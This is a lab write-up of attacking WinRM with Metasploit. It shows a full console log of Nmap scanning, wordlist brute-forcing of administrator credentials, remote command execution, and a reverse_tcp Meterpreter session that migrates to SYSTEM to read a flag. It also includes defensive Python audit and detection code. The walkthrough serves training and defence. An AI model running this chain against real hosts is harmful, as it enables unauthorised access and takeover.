Exploiting WinRM (Windows Remote Management Protocol)
Exploiting WinRM
Windows Remote Management (WinRM) is a Windows remote management protocol that can be used to facilitate remote access with Windows systems.
WinRM is typically used in the following ways:
- Remotely access and interact with Windows hosts on a local network.
- Remotely access and execute commands on Windows systems on the Internet.
- Manage and configure Windows systems remotely.
WinRM typically uses TCP 5985 (HTTP) and 5986 (HTTPS).
WinRM implements access control and security for communication between systems through various forms of authentication.
We can utilize the MSF to identify WinRM users and their passwords as well as execute commands on the target system.
We can also utilize a MSF WinRM exploit module to obtain a meterpreter session on the target system.
Demo: Exploiting WinRM (Windows Remote Management Protocol)
We exploit WinRM by, first and foremost, identifying a username and password combination that gives us access. Then we look at the Metasploit Framework modules that let us execute commands remotely on the target system with those credentials. Finally, we can use the Metasploit Framework WinRM exploit module to obtain a Meterpreter session on the target, giving us remote access to it. The privileges we end up with depend on the permissions of the account whose username and password we discover.
Target IP Address: 10.4.22.219
Make sure that the PostgreSQL database service is started.
service postgresql start
That will allow us to communicate and interact with the Metasploit Framework database.
msfconsole
Create a workspace.
workspace -a WinRM
Perform an Nmap scan on the target system. We use the db_nmap command to run the Nmap scan from within the Metasploit Framework console, so that all of the results are saved into the Metasploit Framework database, in this workspace specifically.
- -sS: Perform a SYN scan.
- -sV: Perform service version detection.
- -O: Perform operating system detection.
It’s going to save the results into the Metasploit Framework database so that we can access the results whenever we want.
db_nmap -sS -sV -O 10.4.22.219
We aren’t able to identify the WinRM service running, primarily because we did not specify a port range: by default, Nmap scans the 1,000 most commonly used ports. We need to tell Nmap to scan the entire TCP port range, all 65,535 ports, which will reveal the service.
db_nmap -sS -sV -O -p- 10.4.22.219
List out the services.
services
On port 5985 we have the WinRM service running.
The first step in confirming that a WinRM service is running on the target is to check which authentication methods the target’s WinRM service supports.
search type:auxiliary winrm
Set up the global variable for the RHOSTS value.
setg RHOSTS 10.4.22.219
That will tell us, first and foremost, whether WinRM is actually enabled on the target system, and which authentication methods the target’s WinRM service supports.
use auxiliary/scanner/winrm/winrm_auth_methods
show options
run
The module also shows the target URI of the WinRM service. To confirm this, we can open it in our browser.
http://10.4.22.219:5985
It tells us that the requested resource is not found. If we try to access the /wsman service (or directory) instead, it doesn’t respond or provide us with any output.
http://10.4.22.219:5985/wsman
The module output tells us that WinRM is indeed running on the target system and that two authentication methods are supported: Negotiate and Basic. That means we can brute-force WinRM on the target to identify a username and password that give us access to the target system and let us execute commands remotely.
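As an added example (my code, not the course’s or Metasploit’s), the same check written as a small Python audit: it reads the WWW-Authenticate schemes a WinRM listener returns and flags Basic offered over plain HTTP, the combination this walkthrough relies on. The exact request sent by winrm_auth_methods may differ, the finding wording is my own, and the sample challenge is constructed.

```python
"""Audit a WinRM listener's advertised authentication methods.

Added example, not code from the course, the lab or Metasploit. The idea
is the one winrm_auth_methods uses: an unauthenticated request to the
WinRM URI (default /wsman) is answered with HTTP 401 and WWW-Authenticate
headers naming the accepted schemes. For a hardening review the finding
that matters is a plain-HTTP listener (5985) that still offers Basic:
Basic without TLS is only usable when AllowUnencrypted is set, and the
credentials then cross the wire merely base64-encoded.
"""
import http.client
from typing import Iterable, List


def parse_auth_methods(www_authenticate: Iterable[str]) -> List[str]:
    """Return the scheme names from WWW-Authenticate header values.

    A server may send one header per scheme or several schemes in one
    comma-separated header. Negotiate/Kerberos/CredSSP carry no
    parameters; Basic carries realm="...". Only the scheme token is kept.
    """
    schemes: List[str] = []
    for value in www_authenticate:
        for part in value.split(","):
            token = part.strip().split(" ", 1)[0]
            if token and token not in schemes:
                schemes.append(token)
    return schemes


def assess(port: int, tls: bool, schemes: List[str]) -> List[str]:
    """Turn the advertised schemes into review findings (wording is an
    assumption of this example, not a Metasploit output format)."""
    findings: List[str] = []
    if "Basic" in schemes:
        findings.append("Basic authentication enabled")
        if not tls:
            findings.append(
                "Basic over plain HTTP on port %d: requires AllowUnencrypted, "
                "credentials cross the wire base64-encoded" % port)
    if not any(s in schemes for s in ("Negotiate", "Kerberos")):
        findings.append("no Negotiate/Kerberos offered")
    return findings


def probe(host: str, port: int = 5985, uri: str = "/wsman",
          tls: bool = False, timeout: float = 5.0) -> List[str]:
    """Send the unauthenticated POST and return the advertised schemes.
    This is the only live network call; the sample run below does not use it."""
    conn_cls = http.client.HTTPSConnection if tls else http.client.HTTPConnection
    conn = conn_cls(host, port, timeout=timeout)
    try:
        conn.request("POST", uri, body="",
                     headers={"Content-Type": "application/soap+xml;charset=UTF-8"})
        resp = conn.getresponse()
        if resp.status != 401:
            return []          # no challenge: not a WinRM listener on this URI
        return parse_auth_methods(resp.headers.get_all("WWW-Authenticate") or [])
    finally:
        conn.close()


# Constructed 401 challenge, modelled on what the lab listener reported
# (Negotiate and Basic on 10.0.20.77:5985); this is not captured traffic.
SAMPLE_CHALLENGE = ["Negotiate", 'Basic realm="WSMAN"']


def sample_findings() -> List[str]:
    """Run the assessment over the constructed challenge."""
    return assess(5985, False, parse_auth_methods(SAMPLE_CHALLENGE))


if __name__ == "__main__":
    print("schemes :", parse_auth_methods(SAMPLE_CHALLENGE))
    for finding in sample_findings():
        print("finding :", finding)
```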
We can utilize winrm_login to perform a brute-force.
search winrm_login
use auxiliary/scanner/winrm/winrm_login
show options
We’re going to perform a brute-force for both the username and password.
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
run
We’re able to identify some legitimate credentials.
CMD: Specify the command to run on the target system to confirm that this indeed works. We can set it to the whoami command, which tells us what permissions we have as the user administrator.
The command tells us that we are currently the server administrator, so we should have administrator privileges if we obtain a Meterpreter session.
search winrm_cmd
use auxiliary/scanner/winrm/winrm_cmd
show options
set USERNAME administrator
set PASSWORD tinkerbell
set CMD whoami
run
To obtain a Meterpreter session through WinRM, we can utilize another module, this time an exploit module.
search winrm_script
use exploit/windows/winrm/winrm_script_exec
show options
set USERNAME administrator
set PASSWORD tinkerbell
run
We have an issue at runtime. The reason is that we didn’t set the FORCE_VBS (Visual Basic Script) option. We can force the module to use the VBS command stager instead of the PowerShell command stager, which in this case we need to do.
set FORCE_VBS true
run
And it’s going to send the command stager.
Once the command stager is sent, it’ll then send the stage, and we’ll get a Meterpreter session. It is then going to attempt to migrate to a specified system level process in order to achieve administrative privileges.
In this case, it tells us that the session is Admin but not System, so it’s going to get us NT AUTHORITY\SYSTEM privileges. It does that by migrating to the svchost process.
meterpreter > sysinfo
...
Meterpreter : x64/windows
We obtain a 64-bit Meterpreter session, not because we used the 64-bit Meterpreter payload, but because this module automatically migrated to the svchost process, which is a 64-bit process.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
We now have NT AUTHORITY\SYSTEM privileges, the highest level of privileges on a Windows system, which means we don’t need to elevate our privileges.
That is how to exploit the WinRM service that’s running on a target system.
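From the defender’s side, as an added example that is not part of the course or lab material: two detection rules in Python for the two stages just walked through, the winrm_login password guessing and command execution via WinRM. The events are constructed samples in a simplified Security-log shape; event IDs 4625/4624/4688 and the wsmprovhost.exe parent are real Windows facts, while the field names, thresholds and values are my assumptions.

```python
"""Detection rules for the WinRM attack path shown in this walkthrough.

Added example, not part of the course or lab. Two rules run over
constructed events in a simplified Windows Security-log shape:
  1. password guessing: `threshold` or more failed network logons (4625,
     logon type 3) from one source inside `window`, noting whether a
     successful logon (4624) from that source followed, which is the
     shape a winrm_login run leaves behind;
  2. remote command execution: a process creation (4688) whose parent is
     wsmprovhost.exe, the WinRM provider host that runs remote commands
     such as the whoami and the command stager seen in the lab.
Event IDs and the wsmprovhost.exe parent are real; field names, values
and thresholds are assumptions of this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

Event = Dict[str, str]

# Constructed sample events (10.10.21.2 is the Kali box in the walkthrough;
# times, users and all process names apart from whoami are invented).
SAMPLE_EVENTS: List[Event] = [
    {"time": "2023-01-28T19:40:01", "id": "4625", "user": "admin", "ip": "10.10.21.2", "logon_type": "3"},
    {"time": "2023-01-28T19:40:02", "id": "4625", "user": "root", "ip": "10.10.21.2", "logon_type": "3"},
    {"time": "2023-01-28T19:40:02", "id": "4625", "user": "administrator", "ip": "10.10.21.2", "logon_type": "3"},
    {"time": "2023-01-28T19:40:03", "id": "4625", "user": "administrator", "ip": "10.10.21.2", "logon_type": "3"},
    {"time": "2023-01-28T19:40:03", "id": "4625", "user": "administrator", "ip": "10.10.21.2", "logon_type": "3"},
    {"time": "2023-01-28T19:40:04", "id": "4624", "user": "administrator", "ip": "10.10.21.2", "logon_type": "3"},
    {"time": "2023-01-28T19:41:10", "id": "4688", "user": "SERVER\\Administrator",
     "parent": "C:\\Windows\\System32\\wsmprovhost.exe", "image": "C:\\Windows\\System32\\whoami.exe"},
    # benign noise: one failed console logon and an ordinary desktop process
    {"time": "2023-01-28T19:42:00", "id": "4625", "user": "bob", "ip": "127.0.0.1", "logon_type": "2"},
    {"time": "2023-01-28T19:43:00", "id": "4688", "user": "SERVER\\bob",
     "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\notepad.exe"},
]


def _ts(event: Event) -> datetime:
    return datetime.fromisoformat(event["time"])


def detect_password_guessing(events: List[Event], threshold: int = 5,
                             window: timedelta = timedelta(minutes=2)) -> List[str]:
    """One alert per source IP whose type-3 logon failures reach
    `threshold` within `window`; says whether a success followed."""
    failures: Dict[str, List[Event]] = defaultdict(list)
    successes: Dict[str, List[datetime]] = defaultdict(list)
    for event in sorted(events, key=_ts):
        if event.get("logon_type") != "3":
            continue                      # console/RDP logons are not WinRM traffic
        if event["id"] == "4625":
            failures[event["ip"]].append(event)
        elif event["id"] == "4624":
            successes[event["ip"]].append(_ts(event))

    alerts: List[str] = []
    for ip, fails in failures.items():
        for start in range(len(fails)):   # sliding window over the sorted failures
            end = start
            while end < len(fails) and _ts(fails[end]) - _ts(fails[start]) <= window:
                end += 1
            if end - start < threshold:
                continue
            users = sorted({f["user"] for f in fails[start:end]})
            last = _ts(fails[end - 1])
            followed = any(last <= s <= last + window for s in successes[ip])
            alerts.append(f"{ip}: {end - start} failed network logons for {users}"
                          + (" followed by a SUCCESSFUL logon" if followed else ""))
            break                         # one alert per source is enough
    return alerts


def detect_winrm_child_process(events: List[Event]) -> List[str]:
    """Flag process creations whose parent is the WinRM provider host."""
    return [f"{e['user']} ran {e['image']} via WinRM" for e in events
            if e["id"] == "4688"
            and e.get("parent", "").lower().endswith("\\wsmprovhost.exe")]


if __name__ == "__main__":
    for line in detect_password_guessing(SAMPLE_EVENTS) + detect_winrm_child_process(SAMPLE_EVENTS):
        print("ALERT", line)
```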
WinRM: Exploitation with Metasploit
Overview
A Kali GUI machine and a target machine running a WinRM server are provided to you. The IP address of the target machine is provided in a text file named target placed on the Desktop of the Kali machine (/root/Desktop/target).
Your task is to fingerprint the WinRM service using the tools available on the Kali machine and then exploit the vulnerability using the Metasploit framework exploit and auxiliary modules.
Objective: Exploit the WinRM service to get a meterpreter on the target and retrieve the flag!
Instructions:
- Your Kali machine has an interface with IP address 10.10.X.Y. Run “ip addr” to know the values of X and Y.
- The IP address of the target machine is mentioned in the file “/root/Desktop/target”
- Do not attack the gateway located at IP address 192.V.W.1 and 10.10.X.1
Dictionaries to use:
- /usr/share/metasploit-framework/data/wordlists/common_users.txt
- /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
Solutions
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-2026.pdf
My own approach
Target IP Address: 10.0.20.77
root@attackdefense:~# service postgresql start
Starting PostgreSQL 12 database server: main.
root@attackdefense:~# msfconsole -q
msf5 > workspace -a WinRM
[*] Added workspace: WinRM
[*] Workspace: WinRM
msf5 > db_nmap -sS -sV -O 10.0.20.77
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-01-28 19:01 IST
[*] Nmap: Nmap scan report for 10.0.20.77
[*] Nmap: Host is up (0.0023s latency).
[*] Nmap: Not shown: 996 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds?
[*] Nmap: 3389/tcp open ms-wbt-server Microsoft Terminal Services
msf5 > db_nmap -sS -sV -O -p- 10.0.20.77
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-01-28 19:06 IST
[*] Nmap: Nmap scan report for 10.0.20.77
[*] Nmap: Host is up (0.0024s latency).
[*] Nmap: Not shown: 65521 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds?
[*] Nmap: 3389/tcp open ms-wbt-server Microsoft Terminal Services
[*] Nmap: 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
[*] Nmap: 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
[*] Nmap: 49664/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49665/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49666/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49667/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49668/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49669/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49671/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49673/tcp open msrpc Microsoft Windows RPC
[*] Nmap: No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
[*] Nmap: TCP/IP fingerprint:
[*] Nmap: OS:SCAN(V=7.70%E=4%D=1/28%OT=135%CT=1%CU=33823%PV=Y%DS=3%DC=I%G=Y%TM=63D526
[*] Nmap: OS:59%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS
[*] Nmap: OS:=U)OPS(O1=M546NW8NNS%O2=M546NW8NNS%O3=M546NW8%O4=M546NW8NNS%O5=M546NW8NN
[*] Nmap: OS:S%O6=M546NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y
[*] Nmap: OS:%DF=Y%T=7F%W=FFFF%O=M546NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=7F%S=O%A=S+%F=AS%RD
[*] Nmap: OS:=0%Q=)T2(R=Y%DF=Y%T=7F%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=7F%W=0%
[*] Nmap: OS:S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=7F%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R
[*] Nmap: OS:=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=7F%W=0%S=A%A=O%F
[*] Nmap: OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
[*] Nmap: OS:T=7F%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=7F%CD
[*] Nmap: OS:=Z)
[*] Nmap: Network Distance: 3 hops
[*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 397.40 seconds
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.0.20.77 135 tcp msrpc open Microsoft Windows RPC
10.0.20.77 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
10.0.20.77 445 tcp microsoft-ds open
10.0.20.77 3389 tcp ms-wbt-server open Microsoft Terminal Services
10.0.20.77 5985 tcp http open Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
10.0.20.77 47001 tcp http open Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
10.0.20.77 49664 tcp msrpc open Microsoft Windows RPC
10.0.20.77 49665 tcp msrpc open Microsoft Windows RPC
10.0.20.77 49666 tcp msrpc open Microsoft Windows RPC
10.0.20.77 49667 tcp msrpc open Microsoft Windows RPC
10.0.20.77 49668 tcp msrpc open Microsoft Windows RPC
10.0.20.77 49669 tcp msrpc open Microsoft Windows RPC
10.0.20.77 49671 tcp msrpc open Microsoft Windows RPC
10.0.20.77 49673 tcp msrpc open Microsoft Windows RPC
msf5 > search type:auxiliary winrm
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/winrm/winrm_auth_methods normal No WinRM Authentication Method Detection
1 auxiliary/scanner/winrm/winrm_cmd normal No WinRM Command Runner
2 auxiliary/scanner/winrm/winrm_login normal No WinRM Login Utility
3 auxiliary/scanner/winrm/winrm_wql normal No WinRM WQL Query Runner
Interact with a module by name or index, for example use 3 or use auxiliary/scanner/winrm/winrm_wql
WinRM Authentication Method Detection
This module sends a request to an HTTP/HTTPS service to see if it is a WinRM service. If it is a WinRM service, it also gathers the Authentication Methods supported.
msf5 > setg RHOSTS 10.0.20.77
RHOSTS => 10.0.20.77
msf5 > use auxiliary/scanner/winrm/winrm_auth_methods
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > show options
Module options (auxiliary/scanner/winrm/winrm_auth_methods):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentification
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.20.77 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5985 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads (max one per host)
URI /wsman yes The URI of the WinRM service
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > run
[+] 10.0.20.77:5985: Negotiate protocol supported
[+] 10.0.20.77:5985: Basic protocol supported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
http://10.0.20.77:5985/
Not Found
HTTP Error 404. The requested resource is not found.
http://10.0.20.77:5985/wsman
WinRM Login Utility
This module attempts to authenticate to a WinRM service. It currently works only if the remote end allows Negotiate(NTLM) authentication. Kerberos is not currently supported. Please note: in order to use this module without SSL, the ‘AllowUnencrypted’ winrm option must be set. Otherwise adjust the port and set the SSL options in the module as appropriate.
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > search winrm_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/winrm/winrm_login normal No WinRM Login Utility
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > use auxiliary/scanner/winrm/winrm_login
msf5 auxiliary(scanner/winrm/winrm_login) > show options
Module options (auxiliary/scanner/winrm/winrm_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DOMAIN WORKSTATION yes The domain to use for Windows authentification
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.20.77 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5985 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
URI /wsman yes The URI of the WinRM service
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/winrm/winrm_login) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
USER_FILE => /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf5 auxiliary(scanner/winrm/winrm_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf5 auxiliary(scanner/winrm/winrm_login) > set VERBOSE false
VERBOSE => false
msf5 auxiliary(scanner/winrm/winrm_login) > run
[+] 10.0.20.77:5985 - Login Successful: WORKSTATION\administrator:tinkerbell
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
WinRM Command Runner
This module runs arbitrary Windows commands using the WinRM Service.
The lab was restarted; the Target IP Address is now 10.0.16.20.
msf5 > search winrm_cmd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/winrm/winrm_cmd normal No WinRM Command Runner
msf5 > use auxiliary/scanner/winrm/winrm_cmd
msf5 auxiliary(scanner/winrm/winrm_cmd) > show options
Module options (auxiliary/scanner/winrm/winrm_cmd):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD ipconfig /all yes The windows command to run
DOMAIN WORKSTATION yes The domain to use for Windows authentification
PASSWORD yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5985 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads (max one per host)
URI /wsman yes The URI of the WinRM service
USERNAME yes The username to authenticate as
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/winrm/winrm_cmd) > setg RHOSTS 10.0.16.20
RHOSTS => 10.0.16.20
msf5 auxiliary(scanner/winrm/winrm_cmd) > set USERNAME administrator
USERNAME => administrator
msf5 auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD tinkerbell
PASSWORD => tinkerbell
msf5 auxiliary(scanner/winrm/winrm_cmd) > set CMD whoami
CMD => whoami
msf5 auxiliary(scanner/winrm/winrm_cmd) > run
[+] 10.0.16.20:5985 : server\administrator
[+] Results saved to /root/.msf4/loot/20230128200653_WinRM_10.0.16.20_winrm.cmd_result_895726.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
WinRM Script Exec Remote Code Execution
This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2 (and above) and VBS CmdStager. The module will check if Powershell is available, and if so uses that method. Otherwise it falls back to the VBS CmdStager which is less stealthy.
msf5 auxiliary(scanner/winrm/winrm_cmd) > search winrm_script
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/winrm/winrm_script_exec 2012-11-01 manual No WinRM Script Exec Remote Code Execution
msf5 auxiliary(scanner/winrm/winrm_cmd) > use exploit/windows/winrm/winrm_script_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/winrm/winrm_script_exec) > show options
Module options (exploit/windows/winrm/winrm_script_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentification
FORCE_VBS false yes Force the module to use the VBS CmdStager
PASSWORD yes A specific password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.16.20 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5985 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URI /wsman yes The URI of the WinRM service
URIPATH no The URI to use for this exploit (default is random)
USERNAME yes A specific username to authenticate as
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.21.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
msf5 exploit(windows/winrm/winrm_script_exec) > set USERNAME administrator
USERNAME => administrator
msf5 exploit(windows/winrm/winrm_script_exec) > set PASSWORD tinkerbell
PASSWORD => tinkerbell
msf5 exploit(windows/winrm/winrm_script_exec) > run
[*] Started reverse TCP handler on 10.10.21.2:4444
[*] checking for Powershell 2.0
[-] Exploit failed: RuntimeError [BUG] Unexpected node test: <:child>: <[:qname, "w", "Items"]>
[*] Exploit completed, but no session was created.
msf5 exploit(windows/winrm/winrm_script_exec) > set FORCE_VBS true
FORCE_VBS => true
msf5 exploit(windows/winrm/winrm_script_exec) > run
[*] Started reverse TCP handler on 10.10.21.2:4444
[*] User selected the FORCE_VBS option
[*] Command Stager progress - 2.01% done (2046/101936 bytes)
[*] Command Stager progress - 4.01% done (4092/101936 bytes)
[*] Command Stager progress - 6.02% done (6138/101936 bytes)
[*] Command Stager progress - 8.03% done (8184/101936 bytes)
[*] Command Stager progress - 10.04% done (10230/101936 bytes)
[*] Command Stager progress - 12.04% done (12276/101936 bytes)
[*] Command Stager progress - 14.05% done (14322/101936 bytes)
[*] Command Stager progress - 16.06% done (16368/101936 bytes)
[*] Command Stager progress - 18.06% done (18414/101936 bytes)
[*] Command Stager progress - 20.07% done (20460/101936 bytes)
[*] Command Stager progress - 22.08% done (22506/101936 bytes)
[*] Command Stager progress - 24.09% done (24552/101936 bytes)
[*] Command Stager progress - 26.09% done (26598/101936 bytes)
[*] Command Stager progress - 28.10% done (28644/101936 bytes)
[*] Command Stager progress - 30.11% done (30690/101936 bytes)
[*] Command Stager progress - 32.11% done (32736/101936 bytes)
[*] Command Stager progress - 34.12% done (34782/101936 bytes)
[*] Command Stager progress - 36.13% done (36828/101936 bytes)
[*] Command Stager progress - 38.14% done (38874/101936 bytes)
[*] Command Stager progress - 40.14% done (40920/101936 bytes)
[*] Command Stager progress - 42.15% done (42966/101936 bytes)
[*] Command Stager progress - 44.16% done (45012/101936 bytes)
[*] Command Stager progress - 46.16% done (47058/101936 bytes)
[*] Command Stager progress - 48.17% done (49104/101936 bytes)
[*] Command Stager progress - 50.18% done (51150/101936 bytes)
[*] Command Stager progress - 52.19% done (53196/101936 bytes)
[*] Command Stager progress - 54.19% done (55242/101936 bytes)
[*] Command Stager progress - 56.20% done (57288/101936 bytes)
[*] Command Stager progress - 58.21% done (59334/101936 bytes)
[*] Command Stager progress - 60.21% done (61380/101936 bytes)
[*] Command Stager progress - 62.22% done (63426/101936 bytes)
[*] Command Stager progress - 64.23% done (65472/101936 bytes)
[*] Command Stager progress - 66.24% done (67518/101936 bytes)
[*] Command Stager progress - 68.24% done (69564/101936 bytes)
[*] Command Stager progress - 70.25% done (71610/101936 bytes)
[*] Command Stager progress - 72.26% done (73656/101936 bytes)
[*] Command Stager progress - 74.26% done (75702/101936 bytes)
[*] Command Stager progress - 76.27% done (77748/101936 bytes)
[*] Command Stager progress - 78.28% done (79794/101936 bytes)
[*] Command Stager progress - 80.29% done (81840/101936 bytes)
[*] Command Stager progress - 82.29% done (83886/101936 bytes)
[*] Command Stager progress - 84.30% done (85932/101936 bytes)
[*] Command Stager progress - 86.31% done (87978/101936 bytes)
[*] Command Stager progress - 88.31% done (90024/101936 bytes)
[*] Command Stager progress - 90.32% done (92070/101936 bytes)
[*] Command Stager progress - 92.33% done (94116/101936 bytes)
[*] Command Stager progress - 94.34% done (96162/101936 bytes)
[*] Command Stager progress - 96.34% done (98208/101936 bytes)
[*] Command Stager progress - 98.35% done (100252/101936 bytes)
[*] Sending stage (176195 bytes) to 10.0.16.20
[*] Meterpreter session 1 opened (10.10.21.2:4444 -> 10.0.16.20:49791) at 2023-01-28 20:22:12 +0530
[*] Session ID 1 (10.10.21.2:4444 -> 10.0.16.20:49791) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is ffvdc.exe (3060) as: SERVER\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[-] Could not migrate to services.exe.
[-] Could not migrate to wininit.exe.
[*] Trying svchost.exe (896)
[+] Successfully migrated to svchost.exe (896) as: NT AUTHORITY\SYSTEM
[*] nil
[*] Command Stager progress - 100.00% done (101936/101936 bytes)
meterpreter >
meterpreter > sysinfo
Computer : SERVER
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > search -f flag.txt
Found 1 result...
c:\flag.txt (32 bytes)
meterpreter > cat c:\\flag.txt
3c716f95616eec677a7078f92657a230